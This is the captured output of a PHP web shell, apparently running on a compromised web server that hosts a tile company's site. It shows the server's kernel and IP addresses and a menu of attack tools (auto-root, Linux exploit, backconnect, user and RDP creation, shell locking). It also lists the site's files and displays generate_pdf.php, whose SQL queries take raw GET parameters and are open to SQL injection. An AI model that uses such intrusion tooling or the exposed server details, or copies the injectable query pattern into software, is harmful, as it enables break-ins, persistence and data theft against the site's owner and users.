Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
bitnami /
apache /
htdocs /
[ HOME SHELL ]
Name
Size
Permission
Action
PHPMailer
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
php
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxr-xr-x
videos
[ DIR ]
drwxr-xr-x
.htaccess
844
B
-rw-r--r--
-----index.html
4.76
KB
-rw-rw-r--
---catalogue.php
74.37
KB
-rw-r--r--
360.php
15.2
KB
-rw-r--r--
73766.jpg
997.9
KB
-rw-r--r--
Cart.class.php
6.98
KB
-rw-r--r--
about-us.php
32.79
KB
-rw-r--r--
add_cart.php
325
B
-rw-r--r--
aj_get_color_test2.php
29.86
KB
-rw-r--r--
aj_get_finish_test2.php
29.31
KB
-rw-r--r--
aj_get_size_test.php
32.16
KB
-rw-r--r--
aj_more_post.php
9.05
KB
-rw-r--r--
aj_more_post_finish.php
8.56
KB
-rw-r--r--
annual-retuns.php
11.32
KB
-rw-r--r--
blog-post.php
13.56
KB
-rw-r--r--
blog.php
6.47
KB
-rw-r--r--
builder.php
36.27
KB
-rw-r--r--
career.php
26.97
KB
-rw-r--r--
cart.php
6.65
KB
-rw-r--r--
catalogue.php
81.01
KB
-rw-r--r--
certifications.php
43.86
KB
-rw-r--r--
clear_cart.php
142
B
-rw-r--r--
composer.json
70
B
-rw-r--r--
composer.lock
15.78
KB
-rw-r--r--
csr.php
33.49
KB
-rw-r--r--
dealer-1.php
27.75
KB
-rw-r--r--
dealer.php
84.36
KB
-rw-r--r--
dealerbkp.php
55.94
KB
-rw-r--r--
delete_item.php
394
B
-rw-r--r--
design_by_italy.php
14.43
KB
-rw-r--r--
event_details.php
6.45
KB
-rw-r--r--
fetch_collection.php
846
B
-rw-r--r--
fetch_finish.php
904
B
-rw-r--r--
fetch_sizes.php
906
B
-rw-r--r--
fetch_surfaces.php
812
B
-rw-r--r--
fpdf.css
1.31
KB
-rw-r--r--
fpdf.php
49.65
KB
-rw-r--r--
generate_pdf.php
2.78
KB
-rw-r--r--
global-export.php
101.88
KB
-rw-r--r--
global-market-1.php
17.76
KB
-rw-r--r--
id-mapping.json
16.73
KB
-rw-r--r--
index.php
129.78
KB
-rw-r--r--
interior-architecture-2.php
59
KB
-rw-r--r--
interior-architecture.php
67.44
KB
-rw-r--r--
landing_page.html
9.74
KB
-rw-r--r--
located-us.php
34.96
KB
-rw-r--r--
manufacturer-and-supplier.php
73.38
KB
-rw-r--r--
milestones.php
15.72
KB
-rw-r--r--
news-play.php
6.62
KB
-rw-r--r--
product-detail-2.php
41.38
KB
-rw-r--r--
product-detail.php
38.5
KB
-rw-r--r--
product-list-back.php
33.34
KB
-rw-r--r--
product-list.php
37.42
KB
-rw-r--r--
product-search.php
28.81
KB
-rw-r--r--
promoter-profile.php
8.8
KB
-rw-r--r--
robots.txt
99
B
-rw-r--r--
save_cart.php
269
B
-rw-r--r--
search_result_all.php
8.51
KB
-rw-r--r--
search_result_application.php
6.78
KB
-rw-r--r--
search_result_color.php
8.93
KB
-rw-r--r--
search_result_finish.php
8.87
KB
-rw-r--r--
search_result_size.php
7.24
KB
-rw-r--r--
server-smtp.php
3.3
KB
-rw-r--r--
server.php
1.19
KB
-rw-r--r--
showroom.php
2.19
KB
-rw-r--r--
sitemap.xml
60.69
KB
-rw-r--r--
tiles-calculator.php
25.23
KB
-rw-r--r--
view_cart.php
3.17
KB
-rw-r--r--
volume.php
47.04
KB
-rw-r--r--
volume_bkp.php
35.94
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : generate_pdf.php
<?php require('fpdf.php'); include("admin/module/obops.php"); $sel_query="SELECT * from tbl_product where prod_id = '".$_GET['id']."' AND prod_title = '".$_GET['name']."'"; $result = mysqli_query($conn,$sel_query); while ($row = mysqli_fetch_assoc($result)) { $sel_collection="SELECT * from tbl_collection where `collection_id` = '".$row['collection_id']."'"; $collection = mysqli_query($conn,$sel_collection); $collection_name = mysqli_fetch_assoc($collection); $sel_size="SELECT * from tbl_collection where `collection_id` = '".$row['size_id']."'"; $size = mysqli_query($conn,$sel_size); $size_name = mysqli_fetch_assoc($size); $sel_finish="SELECT * from tbl_collection where `collection_id` = '".$row['finish_id']."'"; $finish = mysqli_query($conn,$sel_finish); $finish_name = mysqli_fetch_assoc($finish); class PDF extends FPDF { // Page header function Header() { // Logo $this->Image('img/logo-black.png',10,6,30); $this->Ln(4); // Arial bold 15 // $this->SetFont('Arial','B',15); // Move to the right $this->Cell(80); // Title // $this->Cell(30,10,'Title',1,0,'C'); // Line break $this->Ln(20); //$this->Image('img/casa-logo.png',170,6,30); } // Page footer function Footer() { // Position at 1.5 cm from bottom $this->SetY(-15); // Arial italic 8 // $this->SetFont('Arial','I',8); // Page number $this->Cell(0,10,'Page '.$this->PageNo().'/{nb}',0,0,'C'); } } $url = 'uploads/products/'.$row['prod_image2']; $url2 = 'uploads/products/'.$row['prod_image2']; // Place the image in the pdf document // Instanciation of inherited class $pdf = new PDF(); $pdf->AliasNbPages(); $pdf->AddPage(); // $pdf->SetFont('arial','',12); $pdf->Ln(50); $pdf->Image($url,10,30,140); $pdf->Image($url2,155,30,50); $pdf->Ln(70); $pdf->Cell(140,10,"Product details",1,1,'C'); $pdf->Cell(40,10,"Name",1,0); $pdf->Cell(100,10,$row['prod_name'],1,0); $pdf->Ln(); $pdf->Cell(40,10,"Collection",1,0); $pdf->Cell(100,10,$collection_name['collection_name'],1,0); $pdf->Ln(); $pdf->Cell(40,10,"Size",1,0); $pdf->Cell(100,10,$size_name['collection_name'],1,0); $pdf->Ln(); $pdf->Cell(40,10,"Finish",1,0); $pdf->Cell(100,10,$finish_name['collection_name'],1,0); $pdf->Ln(); $pdf->Cell(40,10,"No. Of Tile | Box ",1,0); $pdf->Cell(100,10,$row['packing'],1,0); $pdf->Ln(); $pdf->Cell(40,10,"Sq. Ft. Box",1,0); $pdf->Cell(100,10,$row['sq_ft_box'],1,0); $pdf->Ln(); $pdf->Cell(40,10,"Sq. Ft. Mtr.",1,0); $pdf->Cell(100,10,$row['sq_mtr_box'],1,0); $pdf->Output(); } ?>
Close